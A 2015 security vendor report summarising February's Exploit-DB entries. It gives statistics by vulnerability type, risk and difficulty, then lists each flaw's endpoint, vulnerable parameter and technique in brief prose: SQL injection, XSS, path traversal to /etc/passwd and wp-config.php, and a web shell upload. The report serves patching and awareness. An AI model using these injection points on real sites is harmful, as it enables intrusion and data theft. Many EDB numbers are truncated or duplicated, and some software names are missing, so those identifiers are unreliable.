EDB Analysis Report (2015.02)
Period: 2015.02.01 ~ 2015.02.28
Vulnerabilities published on Exploit-DB (http://exploit-db.com), classified by vulnerability type.

Summary of the analysis (prepared by: Penta Security Systems, Security Evaluation Team)

Analysis of the exploits published on Exploit-DB in February 2015 shows that, as in January, SQL Injection and Cross Site Scripting (XSS) attacks account for the largest number of reports. February is notable both as the month with the largest number of vulnerabilities reported in the last six months and for the large share of very high-risk vulnerabilities. About 60% of the vulnerabilities were assessed as very easy to attack, while about 65% were rated very high risk, so particular attention is required for SQL Injection and Cross Site Scripting (XSS), the two most reported categories.

By software, the open source CMS u5cms and the web-based PHP troubleshooting tool PHPBugTracker had the most reported vulnerabilities, and of varied types. u5cms, newly reported this month, is a CMS suited to building small and lightweight sites; if your site uses this CMS, apply the security patches so that it is not exposed to these vulnerabilities.

1. Reports by vulnerability type

| Vulnerability type | Reports |
|--------------------|---------|
| SQL Injection      | 31      |
| XSS                | 24      |
| LFI                | 6       |
| File Upload        | 1       |
| Total              | 62      |

2. Classification by risk

| Risk   | Reports | Share    |
|--------|---------|----------|
| High   | 40      | 64.52%   |
| Medium | 22      | 35.48%   |
| Low    | 0       | 0.00%    |
| Total  | 62      | 100.00%  |

3. Reports by attack difficulty

| Attack difficulty | Reports | Share    |
|-------------------|---------|----------|
| High              | 1       | 1.61%    |
| Medium            | 24      | 38.71%   |
| Low               | 37      | 59.68%   |
| Total             | 62      | 100.00%  |

4. Reports by major software

| Software                                   | Reports |
|--------------------------------------------|---------|
| u5cms                                      | 17      |
| PHPBugTracker                              | 17      |
| WordPress                                  | 7       |
| Server (MAGMI Plugin)                      | 3       |
| Zeuscart                                   | 2       |
| Piwigo                                     | 2       |
| (name not extracted; v4.4.0.0.39 entries)  | 2       |
| WeBid                                      | 1       |
| Sefrengo                                   | 1       |
| Redaxscript                                | 1       |
| Pragyan                                    | 1       |
| Pandora                                    | 1       |
| IBM Endpoint Manager                       | 1       |
| Fork                                       | 1       |
| Exponent                                   | 1       |
| Clipbucket                                 | 1       |
| Chamilo                                    | 1       |
| BeehiveForum                               | 1       |
| (name not extracted; fotogalerie.php entry)| 1       |
| Total                                      | 62      |

** Details for major software with 5 or more reports
(EDB numbers are reproduced as they survive in the extracted text.)

| EDB no. | Type          | Attack difficulty | Attack risk | Vulnerability name                                                        | Software      |
|---------|---------------|-------------------|-------------|---------------------------------------------------------------------------|---------------|
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - index.php XSS                                               | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - copy.php XSS                                                | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - delete.php XSS                                              | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - done.php XSS                                                | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - editor.php XSS                                              | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - notdone.php XSS                                             | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - sendfile.php XSS                                            | u5cms         |
| 3609    | XSS           | Low               | Medium      | u5cms 3.9.3 - characters.php XSS                                          | u5cms         |
| 3608    | LFI           | Low               | Medium      | u5cms 3.9.3 - thumb.php LFI                                               | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - copy.php SQL Injection                                      | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - localize.php SQL Injection                                  | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - meta.php SQL Injection                                      | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - metai.php SQL Injection                                     | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - nc.php SQL Injection                                        | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - new.php SQL Injection                                       | u5cms         |
| 3607    | SQL Injection | Low               | High        | u5cms 3.9.3 - rename.php SQL Injection                                    | u5cms         |
| 3606    | LFI           | Low               | High        | u5cms 3.9.3 - deletefile.php LFI                                          | u5cms         |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - project.php SQL Injection                           | PHPBugTracker |
| 3660    | XSS           | Low               | Medium      | PHPBugTracker 1.6.0 - project.php XSS                                     | PHPBugTracker |
| 3660    | XSS           | Medium            | Medium      | PHPBugTracker 1.6.0 - user.php XSS                                        | PHPBugTracker |
| 3660    | XSS           | Medium            | Medium      | PHPBugTracker 1.6.0 - group.php XSS                                       | PHPBugTracker |
| 3660    | SQL Injection | Medium            | Medium      | PHPBugTracker 1.6.0 - group.php SQL Injection                             | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - status.php SQL Injection                            | PHPBugTracker |
| 3660    | XSS           | Medium            | High        | PHPBugTracker 1.6.0 - status.php XSS                                      | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - resolution.php SQL Injection                        | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - severity.php SQL Injection                          | PHPBugTracker |
| 3660    | XSS           | Medium            | High        | PHPBugTracker 1.6.0 - severity.php XSS                                    | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - priority.php SQL Injection                          | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - os.php SQL Injection                                | PHPBugTracker |
| 3660    | XSS           | Medium            | High        | PHPBugTracker 1.6.0 - os.php XSS                                          | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - database.php SQL Injection                          | PHPBugTracker |
| 3660    | XSS           | Medium            | High        | PHPBugTracker 1.6.0 - database.php XSS                                    | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - site.php SQL Injection                              | PHPBugTracker |
| 3660    | SQL Injection | Medium            | High        | PHPBugTracker 1.6.0 - bug.php SQL Injection                               | PHPBugTracker |
| 36039   | LFI           | Low               | High        | WordPress Theme Divi Arbitrary - admin-ajax.php Local File Inclusion       | WordPress     |
| 36054   | SQL Injection | Medium            | High        | WordPress Survey and poll - SQL Injection                                 | WordPress     |
| 36058   | SQL Injection | Low               | High        | WordPress Video Gallery 2.7.0 - SQL Injection                             | WordPress     |
| 3606    | SQL Injection | High              | High        | WordPress Webdorado Spider Event Calendar 1.4.9 - admin-ajax.php SQL Injection | WordPress |
| 36086   | SQL Injection | Medium            | High        | WonderPlugin Audio Player 2.0 - admin-ajax.php SQL Injection              | WordPress     |
| 36086   | XSS           | Low               | High        | WonderPlugin Audio Player 2.0 - admin-ajax.php XSS                        | WordPress     |
| 36097   | XSS           | Low               | High        | WordPress Fancybox 3.0.2 - fancybox.php XSS                               | WordPress     |
5. Full list of reported vulnerabilities
(EDB numbers are reproduced as they survive in the extracted text. The core attack code is given as the affected endpoint, the injected parameter and the technique used, as seen in the published request.)

| Date       | EDB no. | Class         | Attack difficulty | Attack risk | Vulnerability name | Core attack code (endpoint / parameter / technique) | Target program | Target environment |
|------------|---------|---------------|-------------------|-------------|--------------------|------------------------------------------------------|----------------|--------------------|
| 2015-02-02 | 3597  | SQL Injection | Low    | High   | Sefrengo CMS 1.6.1 - main.php SQL Injection | POST /sefrengo/backend/main.php (area=settings, action=save_value), parameter value_id: boolean condition appended to the id | Sefrengo | Sefrengo CMS 1.6.1 |
| 2015-02-04 | 3599  | SQL Injection | Low    | High   | Pragyan CMS 3.0 - SQL Injection | /user:<id> path segment: UNION SELECT returning database() and version() | Pragyan | Pragyan CMS 3.0 |
| 2015-02-05 | 35996 | LFI           | Low    | Medium | Server MAGMI Plugin - ajax_pluginconf.php LFI | /magmi/web/ajax_pluginconf.php, parameter file: ../ traversal to /etc/passwd | Server | Server MAGMI Plugin |
| 2015-02-05 | 35996 | XSS           | Low    | Medium | Server MAGMI Plugin - magmi.php XSS | /magmi/web/magmi.php, parameter profile: script tag injection | Server | Server MAGMI Plugin |
| 2015-02-05 | 35996 | XSS           | Low    | Medium | Server MAGMI Plugin - magmi_import_run.php XSS | /magmi/web/magmi_import_run.php, query string: script tag injection | Server | Server MAGMI Plugin |
| 2015-02-09 | 36039 | LFI           | Low    | High   | WordPress Theme Divi Arbitrary - admin-ajax.php Local File Inclusion Vulnerability | /wp-admin/admin-ajax.php?action=revslide_show_image, parameter img: ../wp-config.php | WordPress | WordPress Theme Divi Arbitrary |
| 2015-02-09 | 3603  | LFI           | Low    | Medium | (software name not extracted) - fotogalerie.php Local File Inclusion | /path/fotogalerie.php, parameter id: ../ traversal to /etc/passwd with %00 null byte | (not extracted) | (not extracted) |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - index.php XSS | /u5cms/index.php, parameter c: script tag injection | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - copy.php XSS | /u5cms/u5admin/copy.php, parameter name: img tag with onerror handler | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - delete.php XSS | /u5cms/u5admin/delete.php, parameter name: img tag with onerror handler | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - done.php XSS | /u5cms/u5admin/done.php, parameter n: script tag injection | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - editor.php XSS | /u5cms/u5admin/editor.php, parameter c: script tag injection | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - notdone.php XSS | /u5cms/u5admin/notdone.php, parameter n: script tag injection | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - sendfile.php XSS | /u5cms/u5admin/sendfile.php, parameter l: script tag injection | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3609  | XSS           | Low    | Medium | u5cms 3.9.3 - characters.php XSS | /u5cms/u5admin/characters.php, parameter s: script tag injection | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3608  | LFI           | Low    | Medium | u5cms 3.9.3 - thumb.php LFI | /u5cms/thumb.php, parameter f: ../ traversal to /etc/passwd with %00 null byte | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - copy.php SQL Injection | POST /u5cms/u5admin/copy.php, parameter name: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - localize.php SQL Injection | /u5cms/u5admin/localize.php, parameter name: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - meta.php SQL Injection | request shown via /u5cms/u5admin/editor.php, parameter c: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - metai.php SQL Injection | /u5cms/u5admin/metai.php, parameters typ and name: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - nc.php SQL Injection | /u5cms/u5admin/nc.php, parameter name: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - new.php SQL Injection | POST /u5cms/u5admin/new.php, parameter name: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3607  | SQL Injection | Low    | High   | u5cms 3.9.3 - rename.php SQL Injection | GET /u5cms/u5admin/rename.php, parameter newname: quote plus boolean condition | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3606  | LFI           | Low    | High   | u5cms 3.9.3 - deletefile.php LFI | /u5cms/u5admin/deletefile.php, parameter f: ../ traversal deletes an arbitrary file | u5cms | u5cms 3.9.3 |
| 2015-02-09 | 3603  | SQL Injection | Low    | High   | Redaxscript CMS 2.2.0 - search.php SQL Injection | POST /redaxscript/, parameter search_terms: quote plus OR condition | Redaxscript | Redaxscript CMS 2.2.0 |
| 2015-02-09 | 3604  | SQL Injection | Low    | High   | Fork CMS 3.8.5 - form SQL Injection | /private/en/locale/index?form=filter, parameter type[]: time-based (SLEEP subquery) | Fork | Fork CMS 3.8.5 |
| 2015-02-09 | 36040 | SQL Injection | Medium | High   | Chamilo LMS 1.9.8 - rm_category.php SQL Injection | /main/reservation/rm_category.php?action=delete, parameter id: UNION with IF(...SLEEP) on the user table (time-based blind) | Chamilo | Chamilo LMS 1.9.8 |
| 2015-02-11 | 36057 | XSS           | Low    | Medium | IBM Endpoint Manager - XSS | /cgi-bin/bfenterprise/besgathermirrornew.exe (gatherversion), parameter url: script tag injection | IBM Endpoint Manager | IBM Endpoint Manager 9.1.x versions earlier than 9.1.1229, or 9.2.x versions earlier than 9.2.1.48 |
| 2015-02-11 | 36055 | SQL Injection | Low    | High   | Pandora FMS 5.1 SP1 - index.php SQL Injection | /pandora/index.php (sec=extensions/agents_modules), parameter offset: quote plus boolean condition and comment | Pandora | Pandora FMS 5.1 SP1 |
| 2015-02-11 | 36054 | SQL Injection | Medium | High   | WordPress Survey and poll - SQL Injection | /wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save, parameter survey_id: boolean-based blind (ORD(MID(DATABASE()...))) | WordPress | WordPress Survey and poll |
| 2015-02-11 | 36058 | SQL Injection | Low    | High   | WordPress Video Gallery 2.7.0 - SQL Injection | /wp-admin/admin-ajax.php?action=rss&type=video, parameter vid: boolean condition | WordPress | WordPress Video Gallery 2.7.0 |
| 2015-02-11 | 36509 | XSS           | Low    | High   | Exponent CMS 2.3.1 - XSS | /news/show/title/<title>, title path segment: script tag injection | Exponent | Exponent CMS 2.3.1 |
| 2015-02-13 | 3606  | SQL Injection | High   | High   | WordPress Webdorado Spider Event Calendar 1.4.9 - admin-ajax.php SQL Injection | /wp-admin/admin-ajax.php?action=spiderbigcalendar_month, parameter cat_id: UNION SELECT reading information_schema.tables | WordPress | WordPress Webdorado Spider Event Calendar 1.4.9 |
| 2015-02-16 | 36086 | SQL Injection | Medium | High   | WonderPlugin Audio Player 2.0 - admin-ajax.php SQL Injection | POST /wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item, parameter item[id]: UNION with IF(...SLEEP) on wp_users.user_pass (time-based blind) | WordPress | WordPress WonderPlugin Audio Player 2.0 |
| 2015-02-16 | 36086 | XSS           | Low    | High   | WonderPlugin Audio Player 2.0 - admin-ajax.php XSS | POST /wp-admin/admin-ajax.php?action=wonderplugin_audio_save_item, parameters item[id] and item[customcss]: script tag injection | WordPress | WordPress WonderPlugin Audio Player 2.0 |
| 2015-02-16 | 36089 | SQL Injection | Medium | High   | (software name not extracted) v4.4.0.0.39 - SQL Injection | /crm/blogrss/feed (entity=mostviewedpost), parameter catid: time-based via BENCHMARK | (not extracted) | v4.4.0.0.39 |
| 2015-02-16 | 36089 | LFI           | Low    | Medium | (software name not extracted) v4.4.0.0.39 - export.jsp LFI | /crm/newui/blog/export.jsp, parameter filepath: ../conf/catalina/localhost/crm.xml | (not extracted) | v4.4.0.0.39 |
| 2015-02-16 | 36097 | XSS           | Low    | High   | WordPress Fancybox 3.0.2 - fancybox.php XSS | POST /wp-admin/admin-ajax.php (action=update), parameter mfbfw[padding]: script tag injection | WordPress | WordPress Fancybox 3.0.2 |
| 2015-02-19 | 367   | XSS           | Medium | High   | Piwigo 2.7.3 - admin.php XSS | /admin.php?page=plugin-admintools, parameter page: img tag with onerror handler | Piwigo | Piwigo 2.7.3 |
| 2015-02-19 | 367   | SQL Injection | Medium | High   | Piwigo 2.7.3 - admin.php SQL Injection | POST /piwigo/admin.php?page=history, parameter user: UNION SELECT returning user(), database(), version() | Piwigo | Piwigo 2.7.3 |
| 2015-02-23 | 3654  | XSS           | Low    | Medium | Beehive Forum 1.4.4 - edit_prefs.php XSS | POST /edit_prefs.php, parameters homepage_url, pic_url, avatar_url: script tag injection | BeehiveForum | BeehiveForum 1.4.4 |
| 2015-02-23 | 3655  | File Upload   | Low    | High   | WeBid (version not extracted) - ajax.php File Upload | POST /ajax.php?do=uploadaucimages, multipart field filedata: a .php file (web shell) is accepted | WeBid | WeBid (version not extracted) |
| 2015-02-23 | 3656  | SQL Injection | Low    | Medium | Clipbucket 2.7 RC3 0.9 - view_item.php SQL Injection | /clipbucket/view_item.php (type=photos), parameter item: quote plus OR condition | Clipbucket | Clipbucket 2.7 RC3 0.9 |
| 2015-02-23 | 3659  | XSS           | Medium | Medium | Zeuscart (version not extracted) - index.php XSS | /index.php?do=search, parameter search: body onload handler reading document.cookie | Zeuscart | Zeuscart (version not extracted) |
| 2015-02-23 | 3659  | SQL Injection | Medium | High   | Zeuscart (version not extracted) - /admin SQL Injection | /admin/?do=disporders&action=detail, parameter id: 38-column UNION SELECT returning database() and version() | Zeuscart | Zeuscart (version not extracted) |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - project.php SQL Injection | /admin/project.php?op=edit_component, parameter id: UNION SELECT returning database(), user(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Low    | Medium | PHPBugTracker 1.6.0 - project.php XSS | POST /admin/project.php?op=add, parameter project_name: script tag injection | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Medium | Medium | PHPBugTracker 1.6.0 - user.php XSS | /admin/user.php?op=edit, parameter use_js: script tag reading document.cookie | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Medium | Medium | PHPBugTracker 1.6.0 - group.php XSS | /admin/group.php?op=edit, parameter use_js: script tag reading document.cookie | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | Medium | PHPBugTracker 1.6.0 - group.php SQL Injection | /admin/group.php?op=edit, parameter group_id: time-based (SLEEP) | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - status.php SQL Injection | /admin/status.php?op=edit, parameter status_id: UNION SELECT returning user(), database(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Medium | High   | PHPBugTracker 1.6.0 - status.php XSS | POST /admin/status.php?op=edit, parameter Description: script tag injection | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - resolution.php SQL Injection | /admin/resolution.php?op=edit, parameter resolution_id: UNION SELECT returning user(), database(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - severity.php SQL Injection | /admin/severity.php?op=edit, parameter severity_id: UNION SELECT returning user(), database(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Medium | High   | PHPBugTracker 1.6.0 - severity.php XSS | POST /admin/severity.php?op=edit, parameter Description: script tag injection | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - priority.php SQL Injection | /admin/priority.php?op=edit, parameter priority_id: UNION SELECT returning user(), database(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - os.php SQL Injection | /admin/os.php?op=edit, parameter os_id: UNION SELECT returning user(), database(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Medium | High   | PHPBugTracker 1.6.0 - os.php XSS | POST /admin/os.php?op=edit, parameter Regex: script tag injection | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - database.php SQL Injection | /admin/database.php?op=edit, parameter database_id: UNION SELECT returning user(), version() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | XSS           | Medium | High   | PHPBugTracker 1.6.0 - database.php XSS | POST /admin/database.php?op=edit, parameter Name: script tag injection | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - site.php SQL Injection | /admin/site.php?op=edit, parameter site_id: UNION SELECT returning version(), database() | PHPBugTracker | PHPBugTracker 1.6.0 |
| 2015-02-23 | 3660  | SQL Injection | Medium | High   | PHPBugTracker 1.6.0 - bug.php SQL Injection | /bug.php?op=add, parameter project: UNION SELECT returning user() | PHPBugTracker | PHPBugTracker 1.6.0 |